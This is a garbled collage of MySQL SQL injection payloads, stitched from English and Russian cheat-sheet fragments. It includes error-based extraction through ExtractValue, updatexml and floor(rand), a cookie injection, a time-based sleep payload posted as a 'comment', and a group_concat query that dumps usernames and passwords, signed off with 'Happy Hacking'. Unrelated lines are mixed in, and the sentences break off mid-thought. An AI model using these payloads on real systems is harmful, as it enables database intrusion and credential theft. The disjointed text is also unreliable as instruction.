Numeric: Query like SELECT * FROM Table WHERE id = FUZZ
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5.
Select sum(record_count) as total_database_record_ct from tcounts
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)
x from information_schema.tables group by x)a) and '1'='1. Получение имен всех таблиц: Примечание: m-n подразумевает результат подсчетов значения при m=0, m+1…n-1 hex_code_of_database_name заменить на нужное значение m-n заменить на нужное значение.
Точка впрыска находится на позиции реферата. 3. Куки -инъекция. Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#.
clause Payload: id=3 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)
e.g. select !(select * from (select version())x) - ~0; - ~ is bit negation, ! makes typecast from string to number.
$post_data = any data',(select group_concat(username,0x3a,password) from any_table_name_here))--. You can also use Limit if required, if you dont know how to use Limit go and read Death Row Injection. Happy Hacking.
Комментарий добавил(а): -1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 Дата